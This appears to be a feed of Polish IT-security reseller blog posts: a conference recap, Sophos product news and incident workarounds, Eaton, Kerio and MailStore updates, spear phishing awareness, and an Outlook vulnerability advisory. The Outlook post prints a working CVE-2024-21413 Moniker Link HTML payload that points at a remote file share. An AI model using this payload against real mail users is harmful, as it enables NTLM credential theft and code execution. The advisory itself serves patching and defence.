SEMAFOR 2024 podsumowanie

Wpisy z bloga - ndz., 03/24/2024 - 19:48

W czwartek i piątek 14-15 marca na PGE Narodowy Odbyła się jedna z ważniejszych imprez IT w rocznym kalendarzu #SEMAFOR. Semafor to konferencja organizowana prze specjalistów z branży IT skupiających się na cyberbezpieczeństwie i audycie. Dwa dni niezwykle ciekawych prezentacji, warsztatów i rozmów. W ostatnim dniu wydarzenia miałem przyjemność poprowadzić warsztaty VR. Moja prelekcja i przeprowadzone warsztaty miały na celu propagowanie szkoleń z wykorzystaniem okularów VR. Efekt Immersji realizowaliśmy w środowisku mieszanym i wirtualnym. Warsztaty przygotowałem z wykorzystaniem naszej aplikacji Company (Un)Hacked z pomocą 2 ochotników/kursantów z pośród widowni.

Bardzo intensywne dwa dni obfitowały w niezliczoną ilość testów naszych szkoleń VR Company(un) Hacked oraz CUH Academy. Dziękuję członkom ISSA Polska, za przyjęcie mojej aplikacji do tych warsztatów. Wszystkich, których miałem przyjemność spotkać i rozmawiać na tej konferencji bardzo serdecznie pozdrawiam. Szczególnie serdecznie pozdrawiam Was koledzy, koleżanki z punktu ISSA i komando Cyfrowy Skaut. To były naprawdę bardzo interesujące i inspirujące dwa dni. Do zobaczenia na kolejnych eventach, one są naprawdę potrzebne, by materializować głosy, które znamy i cenimy w naszej branży.

HTC VIVE i Maria Kożuchowska bardzo dziękuję za rekomendację dla okularów XR Elite, których używałem w trakcie pokazów naszej aplikacji #CUHAcademy

Artykuł SEMAFOR 2024 podsumowanie pochodzi z serwisu FirewallBlog - BLOG IT.

Kategorie: Kategoria

DNS Protection – nowa usługa od Sophos

Wpisy z bloga - wt., 03/19/2024 - 10:34

Producent rozwiązań z zakresu bezpieczeństwa IT – firma Sophos, udostępnił nową usługę DNS Protection w ramach EAP (Early Access Program). Produkt ten jest realizowany w chmurze i stanowi część rosnącego zestawu produktów i usług Secure Access Service Edge. W gamie tych rozwiązań znalazły się już udostępnione wcześniej Sophos ZTNA i Sophos SD-WAN Orchestration.

Ulepszona ochrona Internetu i sieci web

Sophos DNS Protection dodaje kolejną warstwę bezpieczeństwa do każdej sieci, blokując natychmiastowo dostęp do niebezpiecznych i niechcianych domen na wszystkich portach, protokołach i aplikacjach. Dotyczy to zarówno urządzeń zarządzanych, jak i niezarządzanych. Ochrona DNS doskonale uzupełnia istniejące narzędzia bezpieczeństwa sieci, a wdrożenie jej jest proste i szybkie.

Zintegrowane raportowanie

Sophos DNS Protection zapewnia wgląd w odwiedzane domeny z Twojej sieci dzięki obszernemu raportowaniu.

Ochrona dla sieci

Produkt ten w aktualnej wersji umożliwia wybór polityki i dostęp do serwera DNS opierający się na publicznym adresie IPv4 zapytań DNS. Usługa obsługuje także dynamiczne adresy IP przy użyciu dostawcy DynamicDNS.

Integracja różnych produktów

Dane i śledzenie zapytań w ramach DNS Protection są udostępniane analitykom do szukania zagrożeń w ramach Sophos XDR i MDR. Dzięki temu szybciej są oni w stanie wykrywać aktywne ataki.

W cenie dla klientów Sophos Firewall z Xstream Protection

Producent zadeklarował, że będzie dodawał DNS Protection do pakietu ochrony Xstream, zwiększając jego wartość dla klientów Sophos Firewall.

Jak zacząć

Rozpoczęcie korzystania z DNS Protection jest łatwe i szybkie – zaktualizuj istniejącą konfigurację sieci, podając globalne adresy IP serwerów DNS, a także konfigurując w usłudze publiczne adresy IPv4 Twojej sieci.

EAP dostępny jest dla klientów z kontami Sophos Central zlokalizowanymi w Stanach Zjednoczonych, Irlandii i Niemczech. Wejdź na forum społeczności Sophos, aby podzielić się swoimi doświadczeniami lub przekaż swoje opinie przez link w produkcie. Program Early Access dostępny jest dla wszystkich, więc zacznij już dziś i pomóż uczynić tę usługę jeszcze lepszą.

Artykuł DNS Protection – nowa usługa od Sophos pochodzi z serwisu FirewallBlog - BLOG IT.

Kategorie: Kategoria

Sophos UTM: IPS zawiesza się po aktualizacji do wersji 9.719

Wpisy z bloga - sob., 03/09/2024 - 17:38
Status: Aktualnie obserwowany

Po zaktualizowaniu Sophos UTM do wersji 9.719, a więc najnowszej, aplikacja IPS/Snort ulega awarii. W trakcie ponownego uruchamiania silnika produktu możesz zaobserwować tymczasowe problem z obsługą ruchu. Poniżej znajdują się informacje dotyczące tego, jak zapobiec awarii IPS po aktualizacji.

Produkty i środowisko

Sophos UTM 9.719

Chronologia wystąpienia i analizy problemu
  • 09.03.2024 08:00 UTC: Sophos wydał poprawkę (pattern update) rozwiązującą problem.
  • 08.03.2024 19:00 UTC: Producent opublikował niniejsze zalecenie zawierające tymczasowe rozwiązanie.
  • 08.03.2024 17:06 UTC: Zespół deweloperski zidentyfikował przyczynę awarii oraz przygotował rozwiązanie tymczasowe.
  • 08.03.2024 13:10 UTC: Informacja o problemie dotarła do zespołu deweloperskiego.
Wpływ

Awaria IPS/Snort powoduje chwilową przerwę w obsłudze ruchu podczas restartu silnika.

Informacje o wersji

Ten problem dotyczy tylko wersji Sophos UTM 9.719, a więc najnowszej.

Rozwiązanie

Wydano poprawkę (pattern update), która naprawia ten problem.

Użyj poniższej komendy do sprawdzenia wersji u2d-ipsbundle, aby sprawdzić, czy poprawka została zainstalowana w Twoim systemie,

# rpm -qa |grep u2d-ipsbundle2 u2d-ipsbundle2-64-9-849 Rozwiązanie tymczasowe:
  • Zaloguj się do konsoli Sophos UTM, a następnie uruchom poniższą komendę:
    • cc set ips snortsettings disable_normalization 1
  • Potwierdź dokonanie zmiany, upewniając się, że wartość ustawiona jest na „1” za pomocą poniższej komendy:
    • cc get ips snortsettings disable_normalization
  • W wyniku tej operacji silnik IPS uruchomi się ponownie, co chwilowo wpłynie na obsługę ruchu.
  • Zespół deweloperski jest w trakcie badania głównej przyczyny problemu.

Gdy pojawi się aktualizacja, postaramy się dodać nowe informacje do tego artykułu.

Jednocześnie przypominamy, że dla Sophos UTM producent ogłosił End of Life. Wszystkich klientów zainteresowanych pozostaniem przy rozwiązaniach Sophos, zachęcamy do migracji do nowej serii Sophos Firewall. Nie masz pojęcia jak to zrobić? Skontaktuj się z nami – doradzimy, pomożemy i przeprowadzimy Cię krok po kroku przez ten proces,

Artykuł Sophos UTM: IPS zawiesza się po aktualizacji do wersji 9.719 pochodzi z serwisu FirewallBlog - BLOG IT.

Kategorie: Kategoria

Sophos Endpoint – problem z certyfikatami SSL/TLS – „Twoje połączenie nie jest prywatne” (29.02.2024)

Wpisy z bloga - czw., 02/29/2024 - 08:56
Błąd deszyfrowania SSL/TLS w Sophos Central Intercept X (29.02.2024)

W ślad za informacją opublikowaną przez firmę Sophos chcemy poinformować naszych klientów o obserwowanym dzisiaj problemie z deszyfrowaniem ruchu SSL/TLS. Stacje końcowe i serwery uruchomione ponownie 29 lutego 2024 roku nie są w stanie odszyfrować certyfikatów root w trakcie zestawiania połączeń HTTPS. W przeglądarce pojawis się następujący komunikat:

Problem ten występuje tylko wtedy, gdy deszyfrowanie SSL/TLS dla witryn HTTPS jest włączone w polityce ochrony przed zagrożeniami. Drugim warunkiem jest natomiast ponowne uruchomienie punktu końcowego w dniu 29 lutego 2024 roku.

Produkty i środowisko

Problem dotyczy następujących produktów

Objawy

Możesz obserwować trudności z przeglądaniem internetu do czasu zastosowania tymczasowego rozwiązania. Musisz przekonfigurować Sophos Central, aby wyłączyć deszyfrowanie HTTPS.

Tymczasowe rozwiązanie
  1. Wyłącz deszyfrowanie SSL/TLS dla witryn HTTPS w polityce ochrony przed zagrożeniami dla endpointów / serwerów zgłaszających ten problem.
    • Przejdź do My Products -> Endpoint lub Server.
    • Kliknij Policies.
    • Kliknij polisę Threat Protection, którą chcesz zmienić, a następnie wyłącz SSL/TLS decryption of HTTPS websites.
  2. Kolejne ponowne uruchomienie urządzenia 1 marca (wg. czasu systemowego) rozwiąże problem – deszyfrowanie HTTPS można będzie włączyć po tej dacie.

Dla Sophos Home:

  • Otwórz Dashboard
  • Przejdź do PROTECTION -> Web
  • Kliknij na suwak, aby wyłączyć HTTPS Website Decryption (niebieski – u góry po prawej stronie).

Dla stacji i serwerów korzystających z wersji przedpremierowych w ramach Sophos EAP (Early Access Program) należy wyłączyć deszyfrowanie SSL/TLS w ustawieniach globalnych:

  • Przejdź do My Products -> General Settings.
  • W sekcji General kliknij SSL/TLS decryption of HTTPS websites.
  • Wyłącz przełącznik, a następnie zapisz zmiany w konfiguracji klikając Save.
AKTUALIZACJA #1:

Sophos poinformował, że nadpisał polisę odszyfrowywania SSL/TLS. Zmiana ta będzie nadrzędna względem skonfigurowanej zasady ochrony przed zagrożeniami i zapobiegnie wystąpieniu problemu.

Producent zdecydowanie zaleca ponowne uruchomienie wszystkich dotkniętych stacji i serwerów 1 marca 2024 roku oraz jeśli to konieczne, ponowne włączenie ustawień odszyfrowywania SSL/TLS.

Uwaga: Jeśli nie zrestartujesz urządzenia, problem ten może powrócić.

Sophos planuje automatycznie przywrócić normalne obsługiwanie ustawień odszyfrowywania SSL/TLS 1 marca 2024 roku.

Artykuł Sophos Endpoint – problem z certyfikatami SSL/TLS – „Twoje połączenie nie jest prywatne” (29.02.2024) pochodzi z serwisu FirewallBlog - BLOG IT.

Kategorie: Kategoria

Zarządzanie UPS-ami z Eaton IPM

Wpisy z bloga - śr., 02/28/2024 - 22:09

Intelligent Power Manager (IPM) od EATON to rozwiązanie pozwalające na monitorowanie i zarządzanie automatyzacją procesów w Twojej serwerowni.

IPM instalowany jest na serwerze zarządzającym lokalnie w DataCenter lub w pojedynczej serwerowni.

System monitoruje urządzenia zasilania w oparciu o protokół SNMP i MQTT (UPS Eaton).

Aplikacja posiada zaawansowany panel administracyjny m. in pozwalający na monitowanie parametrów lokalnego DC w tym zużycie prądu dla urządzeń IT.

Istnieje możliwość aktualizacji UPS (w tym innych dostawców). Pełnie wsparcie dla ePDU Eaton oraz masowego wdrożenia parametrów konfiguracyjnych z poziomu jednej konsoli zarządzającej.

Automatyzacja procesów IPM kompatybilna jest z systemami takich producentów jak: Microsoft (Server, Hyper-V), VMware, Niutanix, Dell-VxRail, Netapp, HP (One View).

Dzięki tak szerokiej kompatybilności, IPM Eaton pozwala na tworzenie bezpiecznych polityk wyłączania lub sekwencyjne włączanie się systemów fizycznych i maszyn wirtualnych.

Eaton_DPQ_Channel_v1.7

Umów się na bezpłatną prezentację lub POC-a

[contact-form]

 

Podstawowe zalety IPM:

– ochrona danych (bezpieczne wyłączanie maszyn bez straty danych)

– ciągłość pracy (np. w środowisku zwirtualizowanym, migracja systemów/maszyn wirtualnych pomiędzy lokalizacjami by świadczyć nieprzerwaną usługę)

– oszczędność energii (możliwość budowania polityk z harmonogramem w celu wyłaczacznia/włączania systemów/urządzeń)

Artykuł Zarządzanie UPS-ami z Eaton IPM pochodzi z serwisu FirewallBlog - BLOG IT.

Kategorie: Kategoria

Spear phishing – dobrze przygotowany i celowy phishing

Wpisy z bloga - wt., 02/27/2024 - 22:30

Spear phishing to taktyka wykorzystywana do kradzieży poufnych danych.

Czym jest Spear phishing można najlepiej poznać w pierwszym scenariuszu naszego szklenia #CompanyUnHacked.

Spear phishing od zwykłych ataków phishingowych różni ją brak masowego charakteru. W tym przypadku cyberprzestępca starannie wybiera swoją ofiarę, przeszukuje internet (szczególnie serwisy społecznościowe) pod kątem dostępnych na jej temat informacji i wykorzystuje je do działań manipulacyjnych. Choć metoda ta jest czasochłonna, cyberprzestępcy chętnie po nią sięgają z uwagi na potencjalne wysokie zyski. Ekspertka Fortinet rozkłada ten fenomen na czynniki pierwsze i podpowiada, jak się przed nim ochronić.

Metoda spear phishingu często jest wykorzystywana podczas ataków na najbardziej wpływowe podmioty. Przykładem takiej sytuacji jest incydent z 2019 roku, w wyniku którego hakerowi udało się ukraść ponad 100 tys. dolarów od Google’a i Facebooka.

  • Jak wygląda typowy atak?

Pierwszym krokiem cyberprzestępcy jest wybór ofiary. Przeważnie zostaje nią osoba posiadająca dostęp do najcenniejszych zasobów w swojej firmie. Może to być pracownik działu księgowości, ze względu na przysługujący mu wgląd do informacji o sytuacji finansowej firmy i jej klientów. Ofiarami spear phishingu bywają też osoby odpowiedzialne za zarządzanie kadrami, ponieważ mają dostęp do wrażliwych danych personelu – wyjaśnia Jolanta Malak, dyrektorka Fortinet w Polsce.
Po wytypowaniu swojego celu przestępca rozpoczyna proces zbierania szczegółowych informacji na jego temat. Krok ten wiąże się przeważnie z wykorzystaniem mediów społecznościowych. Dzięki zgromadzonej wiedzy sprawca ataku jest w stanie przedstawić się jako osoba, którą ofiara zna i darzy zaufaniem. W dalszej kolejności przestępca kontaktuje się ze swoim celem za pośrednictwem portalu społecznościowego lub poprzez przesłanie wiadomości e-mail zawierającej:

  • link do złośliwej strony – po wejściu na nią, ofiara zostanie poproszona o udostępnienie swoich danych;
    link prowadzący do złośliwego kodu – po jego otwarciu, na urządzenie pobranie zostanie złośliwe oprogramowanie;
  • prośbę o udostępnienie informacji – sama wiadomość będzie zawierała treść zachęcającą do udzielenia atakującemu informacji, które zagwarantują mu dostęp do wrażliwych obszarów sieci firmy lub kont ofiary w mediach społecznościowych.

Cyberprzestępcy mierzą wysoko – czym jest whaling?
Whaling to rodzaj spear phishingu, w ramach którego za ofiarę wybierane są osoby na stanowiskach kierowniczych. Stosujący tę metodę przestępcy po nawiązaniu kontaktu ze swoją ofiarą, podają się za dyrektorów lub innych wysoko postawionych pracowników danego przedsiębiorstwa. Mogą także podszywać się pod potencjalnych dostawców. Przygotowanie ataku typu whaling wymaga od atakującego więcej czasu i przygotowań, jednak mimo tego przestępcy często decydują się na tę taktykę.

  • Osoby na stanowiskach kierowniczych wykazują mniejszą wrażliwość na cyberataki niż zwykli pracownicy. Wynika to z faktu, że często znajdują się one pod większą presją oraz mają do wykonania więcej zadań o krytycznym znaczeniu, co zmniejsza ich ogólną czujność – zauważa Jolanta Malak.
    Jak się chronić?
  • Podstawową formą obrony przed spear phishingiem jest inwestycja w oprogramowanie antywirusowe. Należy jednak pamiętać, że aby skutecznie wykonywało ono swoje zadanie, musi być zaktualizowane do najnowszej wersji. Warto rozważyć także instalację filtru antyspamowego. Jego obecność na urządzeniu znacznie ograniczy ryzyko otrzymania wiadomości phishingowej.
  • Ponadto, wskazanym krokiem jest prowadzenie szkoleń z zakresu cyberbezpieczeństwa. Treningi te mogą mieć postać symulacji ataku phishingowego, ciekawą opcją są warsztaty cyberbezpieczeństwa. W Sun Capital łączymy warsztaty KAC (Klub Anonimowej Cyberofiary), szkolenia w formie prelekcji oraz szkolenia w formie aplikacji VR, gdzie 10 scenariuszy w formie rozgrywki ma niesamowite właściwości gry w środowisku immersyjnej. W ten sposób personel zyska praktyczną wiedzę na temat zagrożenia i będzie na nie mniej podatny.
  • Dodatkowo, firmy powinny posiadać odgórnie ustaloną procedurę zgłaszania podejrzanych wiadomości. Metodą pozwalającą na ograniczenie ryzyka wystąpienia spear phishingu jest również uwierzytelnianie wieloskładnikowe. To dodatkowa warstwa ochrony, która w znacznym stopniu utrudnia osobie niepowołanej zalogowanie się na koncie pracownika. Wymaga bowiem pomyślnego przejścia weryfikacji, która może uwzględniać wprowadzenie unikalnego kodu lub nawet zeskanowanie odcisku palca.
  • Oprócz powyższych wskazówek najskuteczniejszą obroną przed atakami typu spear phishing jest zdrowy rozsądek. Dane o kluczowym dla funkcjonowania firmy znaczeniu wymagają obchodzenia się z najwyższą ostrożnością. W związku z tym niewskazane jest ich udostępnianie, szczególnie za pośrednictwem poczty e-mail lub innych form komunikacji online. Dodatkowo, do wszelkich wiadomości zawierających załączniki lub linki należy podchodzić z pewną dozą nieufności. Zaś w przypadku wątpliwości co do rzeczywistego nadawcy wiadomości warto skontaktować się z podpisaną w niej osobą alternatywną metodą, np. przez telefon lub osobiście.

źródło informacji (modyfikowane):
SAROTA PR

 

Artykuł Spear phishing – dobrze przygotowany i celowy phishing pochodzi z serwisu FirewallBlog - BLOG IT.

Kategorie: Kategoria

Sophos Firewall XGS 116(w) – problemy z zasilaniem PoE 802.3at

Wpisy z bloga - pt., 02/23/2024 - 09:22

Urządzenia Sophos Firewall XGS w niektórych wersjach posiadają porty Ethernet umożliwiające zasilanie innych urządzeń. Sophos Firewall XGS 116 oraz wersja „w”, czyli wyposażona we wbudowany access point, posiada port PoE w standardzie 802.3at (30W). Niestety, po tzw. zimnym starcie (cold start) podłączone do niego urządzenia mogą nie otrzymać wystarczającej ilości energii. Problem może występować także po tzw. cyklu zasilania (power cycle), czyli wyłączeniu i ponownym włączeniu urządzenia.

Producent poinformował, że problem ten dotyczy wyłącznie urządzeń XGS 116(w), działających na firmware w wersji 19.5.3 MR3.

Objawy

Urządzenia PoE wymagające standardu 802.3at (30W) mogą zgłaszać, że po zimnym uruchomieniu firewalla lub „cyklu zasilania” nie otrzymują wystarczającej ilości energii.

Przyczyna

W przypadku korzystania z modelu XGS 116 oraz XGS 116w, kontroler PoE domyślnie ustawiony jest na standard 802.3af (15W). To system operacyjny Sophos Firewall w wersji 19.5.3 MR3 i nowszych konfiguruje kontroler na standard 802.3at (30W). W związku z tym system operacyjny musi się uruchomić, aby urządzenie obsługiwało wyższy standard. Konieczność ta powoduje pewne opóźnienie w możliwości właściwego zestawienia zasilania PoE 802.3at.

Rozwiązanie

Jeśli urządzenie zasilane przez PoE jest podłączone do XGS 116(w) przed zimnym startem lub „cyklem zasilania”, będzie próbować ustalić  zasilanie zgodnie ze standardem 802.3af. Dopiero uruchomienie na urządzeniu systemu Sophos Firewall nadpisze ustawienia kontrolera PoE na 802.3at. Zwłoka z tego wynikająca może powodować, iż podłączone urządzenie uzna, że Sophos Firewall nie posiada wystarczającej mocy zasilania. Należy zaktualizować Sophos Firewall do wersji 19.5.3 MR3 lub nowszej, a następnie zastosować jedno z poniższych rozwiązań:

  • Po zimnym uruchomieniu lub „cyklu zasilania”, XGS 116(w) wymaga jednego dodatkowego ponownego uruchomienia. Dzięki temu podłączone urządzenie PoE będzie mogło skorzystać z wyższego standardu.
  • Jeśli ponowne uruchomienie nie jest możliwe, można odłączyć, a następnie podłączyć kabel Ethernet urządzenia zasilanego po PoE. Ta operacja wymusi ponowne negocjowanie standardu zasilania.

Artykuł Sophos Firewall XGS 116(w) – problemy z zasilaniem PoE 802.3at pochodzi z serwisu FirewallBlog - BLOG IT.

Kategorie: Kategoria

GFI KerioControl 9.4.4 – wzrost wydajności oraz wsparcie dla IKEv2 VPN

Wpisy z bloga - czw., 02/22/2024 - 22:20

W ślad za producentem pragniemy podzielić się świetną informacją, że GFI KerioControl 9.4.4 został oficjalnie udostępniony. Aktualizacja ta przynosi znaczny wzrost wydajności, nowe funkcje i poprawki stabilności bazujące na opiniach użytkowników oraz uczestników programu testowania beta.

Kluczowe zmiany obejmują:
  • Poprawioną wydajność – zwiększona przepustowość sieci dla płynniejszego i bardziej efektywnego użytkowania,
  • Konfigurację GRO – łatwe dostosowanie ustawień Generic Receive Offload (GRO) bezpośrednio w panelu administracyjnym, umożliwiające optymalizację ruchu sieciowego,
  • Obsługę IKEv2 – bezpieczne połączenie VPN z urządzeń Android (wersja 13 i nowsze) i innych platform za pomocą protokołu IKEv2.

Ważna informacja: GFI KerioControl 9.4.4 nie obsługuje oficjalnie urządzeń NG500 (koniec życia od 31 grudnia 2023 roku). Zalecana jest aktualizacja do nowej platformy sprzętowej NG510 lub własnego urządzenia bazującego na UEFI. Informacje na temat wsparcia dla własnego sprzętu do budowy software appliance znajdują się w zasobach na stronie producenta.

Wszystkich zainteresowanych dokładniejszym poznaniem wprowadzonych zmian odsyłamy do specjalnie przygotowanych na tę okazję przewodników. Można je znaleźć na stronie producenta, w zasobach udostępnionych w ramach sekcji produktowej dotyczącej KerioControl.

Nowa wersja GFI KerioControl 9.4.4 jest dostępna do pobrania w GFI Upgrade Center. Pełna lista zmian dla tego wydania znajduje się na stronie internetowej producenta.

Gorąco zachęcamy do aktualizacji do tej wersji, szczególnie klientów chcących korzystać z połączeń VPN na nowych urządzeniach Android.

Artykuł GFI KerioControl 9.4.4 – wzrost wydajności oraz wsparcie dla IKEv2 VPN pochodzi z serwisu FirewallBlog - BLOG IT.

Kategorie: Kategoria

Błąd krytyczny na stacjach końcowych z Sophosem i Teramind

Wpisy z bloga - czw., 02/22/2024 - 16:25

Użytkownicy oprogramowania antywirusowego Sophos Intercept X, którzy jednocześnie wykorzystywali na swoich stacjach końcowych agenta Teramind, mogli napotkać nieprzyjemną niespodziankę w postaci Niebieskiego Ekranu (BSOD). Ekran ten alarmował o awarii pliku Netio.sys, wyświetlając kod błędu SYSTEM_SERVICE_EXCEPTION (3b).

Produkty i środowiska, których dotyczył problem
  • Sophos Central Windows Endpoint
  • Sophos Central Windows Server
  • Sophos Core Agent 2023.2
Obecny status

Działy rozwoju zarówno w firmie Sophos jak i Teramind opracowały specjalne buildy w celu rozwiązania pojawiającego się problemu.

Jeśli ktoś z Państwa, doświadczył powyższego problemu prosimy o kontakt z supportem Sophosa, bądź z nami w celu uzyskania dostępu do wymienionego builda.

Alternatywne obejście problemu

Do czasu zaktualizowania oprogramowania, można tymczasowo obejść problem, wyłączając kilka kluczowych ustawień:

Real time Scanning Internet
– skanowanie pobieranych plików
– blokada dostępu do złośliwych stron internetowych

Web Control Policy
-musi zostać całkowicie wyłączona

Z uwagi na nieprzewidziane skutki do jakich może prowadzić implementacja tego typu ustawień, zdecydowanie bardziej polecamy uzyskanie dostępu do specjalnie opracowanego builda, dzięki któremu  zapewnicie Państwo stabilne działanie swoich systemów bez konieczności rezygnacji z ważnych funkcji ochronnych.

Artykuł Błąd krytyczny na stacjach końcowych z Sophosem i Teramind pochodzi z serwisu FirewallBlog - BLOG IT.

Kategorie: Kategoria

Krytyczna podatność w Microsoft Outlook

Wpisy z bloga - czw., 02/15/2024 - 12:03

Nowa krytyczna podatność w Microsoft Outlook umożliwia zdalnym atakującym exploitację i omijanie widoku chronionego aplikacji wchodzących w skład pakietu Office.

Podatność odkrył badacz Check Point – Haifei Li. Oznaczono ją jako CVE-2024-21413. Dzięki niej możliwe jest zdalne wykonanie kodu (RCE), gdy w Outlooku otwierane są e-maile zawierające złośliwe linki. Atakujący mogą także obejść widok chroniony, przeznaczony do blokowania szkodliwej zawartości w plikach Office. Takie linki powodują otwarcie pliku w trybie edycji, zamiast odczytu.

Gigant z Redmond ostrzega, że wektorem ataku jest panel podglądu, umożliwiający udany atak nawet podczas przeglądania złośliwie spreparowanych dokumentów Office. Nieuwierzytelnieni atakujący mogą zdalnie wykorzystać CVE-2024-21413 w atakach o niskim stopniu skomplikowania. Użytkownik nie musi podejmować żadnej interakcji, aby stać się ofiarą.

„Atakujący, który pomyślnie wykorzysta tę lukę, mógłby uzyskać szerokie uprawnienia, obejmujące funkcje odczytu, zapisu i usuwania”, wyjaśnia Microsoft. Atakujący mogą stworzyć złośliwy link, który omija protokół widoku chronionego. Tym samym może prowadzić to do ujawnienia lokalnych informacji uwierzytelniających NTLM i zdalnego wykonania kodu (RCE).

Podatność CVE-2024-21413 dotyczy wielu produktów Office, w tym:

  • Microsoft Office LTSC 2021,
  • Microsoft 365 Apps for Enterprise,
  • Microsoft Office 2016 i Microsoft Office 2019 (w ramach wsparcia rozszerzonego).

Badacze z firmy Check Point opisują podatność jako Moniker Link. Pozwala ona atakującym obejść wbudowane zabezpieczenia Outlook dla złośliwych linków osadzonych w e-mailach. Atak polega na wykorzystaniu protokołu file:// i dodaniu znak wykrzyknika do adresu URL, wskazującego na serwery kontrolowane przez napastników.

<a href="file:///\\10.0.0.1\exploit\exploit.rtf!cokolwiek">Niezwykle bezpieczny link</a>

Hiperłącze omija zabezpieczenia Outlooka, a sam Outlook uzyskuje dostęp do zdalnego zasobu „\\10.0.0.1\exploit\exploit.rtf” po kliknięciu w link. Nie generuje przy tym żadnych ostrzeżeń czy błędów.

Podatność ta wynika z niebezpiecznego API MkParseDisplayName, które może wpłynąć na inne oprogramowanie korzystające z tego interfejsu.

Ataki wykorzystujące CVE-2024-21413 mogą skutkować kradzieżą informacji uwierzytelniających NTLM oraz wykonaniem dowolnego kodu przy użyciu złośliwiych dokumentów Office.

Check Point potwierdza obecność błędu Moniker Link w najnowszych środowiskach Windows 10/11 + Microsoft 365 (Office 2021). Specjaliści z tej firmy zalecają wszystkim użytkownikom Outlooka natychmiastową instalację oficjalnej łatki.

Artykuł Krytyczna podatność w Microsoft Outlook pochodzi z serwisu FirewallBlog - BLOG IT.

Kategorie: Kategoria

MailStore V23.4 – archiwizacja NDR i możliwość kasowania oflagowanych wiadomości

Wpisy z bloga - wt., 02/13/2024 - 15:20

MailStore w wersji V23.4 wprowadza liczne usprawnienia jednego z najlepszych rozwiązań do archiwizacji poczty elektronicznej. Nowa wersja dostępna jest jako MailStore Server (dla klientów posiadających własne rozwiązanie), MailStore Service Provider Edition (SPE) i MailStore Home. Wśród nowości znajdują się opcje zwiększające funkcjonalność, szczególnie oczekiwane zarówno przez administratorów, jak i użytkowników. Poniżej przedstawiamy kluczowe elementy MailStore V23.4:

Archiwizacja raportów NDR z alternatywnej skrzynki journalingowej:
  • Ułatwia odzyskiwanie danych dla użytkowników MailStore Server i SPE korzystających z Microsoft 365/Exchange Online,
  • Pozwala na automatyczny import raportów dziennika zagnieżdżonych w raportach o nieudanym dostarczeniu (NDR) z alternatywnej skrzynki, poprawiając ogólną niezawodność.
Możliwość usuwania oflagowanych wiadomości:
  • Umożliwia zdalne usuwanie e-maili oznaczonych flagą przez użytkowników w skrzynce pocztowej serwera pocztowego,
  • Zwiększa elastyczność, umożliwiając usuwanie oznaczonych wiadomości, poprawiając użyteczność dla profili archiwizacji M365, Exchange i IMAP.
Ulepszone profile archiwizacyjne:
  • Zapewnia administratorom większą elastyczność w definiowaniu profili archiwizacji,
  • Dodaje nową opcję filtrów, umożliwiającą selektywną archiwizację e-maili utworzonych po określonej dacie,
  • Przydatne także w przypadku archiwizacji wybranych okresów, migracji archiwów itp.
Ulepszenia interfejsu API:
  • Wprowadza ulepszenia w interfejsach API MailStore Server i SPE, umożliwiające lepsze monitorowanie instalacji oraz aktualizację magazynów archiwów,
  • Pozwala administratorom MailStore Server używać interfejsu API do wymiany certyfikatów serwera, zwiększając prostotę zarządzania i podnosząc bezpieczeństwo.
Inne ulepszenia:
  • Dodaje warstwę autentykacji i zabezpieczeń SASL dla archiwizacji wielu skrzynek IMAP, umożliwiając wybór różnych formatów identyfikatorów użytkownika,
  • Usprawnia auto-discovery dla Microsoft 365, ułatwiając archiwizację folderów publicznych,
  • Zawiera wiele aktualizacji zabezpieczeń i poprawek błędów.

Wraz z wersją MailStore V23.4, producent stawia sobie za cel usprawnienie procedury archiwizacji, oferując zaawansowane funkcje i odpowiadając na potrzeby użytkowników, co czyni tę aktualizację potencjalnie wartościową dla wszystkich organizacji korzystających z rozwiązań MailStore.

Gorąco zachęcamy do wykonania aktualizacji, ponieważ oprócz wspomnianych usprawnień, producent nieustannie rozwija produkt pod kątem bezpieczeństwa i kompatybilności. Zwracamy jednocześnie uwagę, iż wraz z wprowadzaniem nowych wersji produktu, zmieniają się wymagania systemowe. W ostatnim czasie producent zakończył wsparcie dla niewspieranych wersji WIndows Server 2012 i 2012R2, a także Exchange Server 2003.

Artykuł MailStore V23.4 – archiwizacja NDR i możliwość kasowania oflagowanych wiadomości pochodzi z serwisu FirewallBlog - BLOG IT.

Kategorie: Kategoria

Zakończenie wsparcia dla MyKerio oraz przejście do GFI AppManager

Wpisy z bloga - pon., 02/12/2024 - 14:00

Producent rozwiązań z zakresu bezpieczeństwa – Kerio Control oraz serwera pocztowego – Kerio Connect przedstawił kluczowe daty i szczegóły dotyczące zakończenia wsparcia dla usługi centralnego zarządzania i alertowania – MyKerio. Jednocześnie przedstawił propozycję przejścia na nowe rozwiązanie – GFI AppManager.

To właśnie zrozumienie zróżnicowanych potrzeb różnych klientów skłoniło firmę GFI do podzielenia tej operacji. Zakończenia wsparcia dla MyKerio oraz przejście do GFI AppManager rozłożono na trzy fazy:

  • 31 stycznia: ostateczny termin dla użytkowników MyKerio zarządzających pojedynczą organizacją obsługującą jedno rozwiązanie GFI KerioConnect lub GFI KerioControl.
  • 29 lutego: ostateczny termin dla użytkowników MyKerio zarządzających pojedynczą organizacją obsługującą maksymalnie 15 instancji GFI KerioConnect i GFI KerioControl łącznie.
  • 31 marca: ostateczny termin dla wszystkich pozostałych użytkowników.

Dzięki takiemu harmonogramowi, przeniesienie obsługi wdrożeń wszelkich rozmiarów do GFI AppManager będzie łatwiejsze. Tym samym wszyscy klienci będą dysponować dostatecznym czasem przeznaczonym na migrację dla każdego rozwiązania.

Szczególnie zachęcamy użytkowników GFI KerioControl oraz GFI KerioConnect do wykonania aktualizacji do najnowszych wersji produktów (KerioControl 9.4.3 patch 4 oraz KerioConnect 10.0.4), aby zapewnić płynny przebieg migracji. Najnowsza wersja zapory sieciowej, podobnie jak i serwera pocztowego oferują znaczne ulepszenia wydajności i kompatybilność z GFI AppManager.

Kroki do pomyślnego przejścia na GFI AppManager:

  1. Zaktualizuj GFI KerioControl lub GFI KerioConnect do najnowszych wersji.
  2. Wszystkie kroki wymagane do dołączenia do GFI AppManager znajdziesz w dedykowanym przewodniku na stronie producenta.

W razie problemów służymy wsparciem wszystkim klientom, którzy posiadają aktywne subskrypcje i zakupili produkty za naszym pośrednictwem. Jeśli masz dodatkowe pytania, zawsze możesz do nas napisać za pośrednictwem formularza.

Szczegółowe informacje na temat dostępności GFI AppManager oraz zakończenia wsparcia dla MyKerio można znaleźć w dokumencie FAQ na stronie producenta.

Artykuł Zakończenie wsparcia dla MyKerio oraz przejście do GFI AppManager pochodzi z serwisu FirewallBlog - BLOG IT.

Kategorie: Kategoria

Sophos Central Admin – konserwacja w sobotę 17 lutego

Wpisy z bloga - pt., 02/09/2024 - 15:06

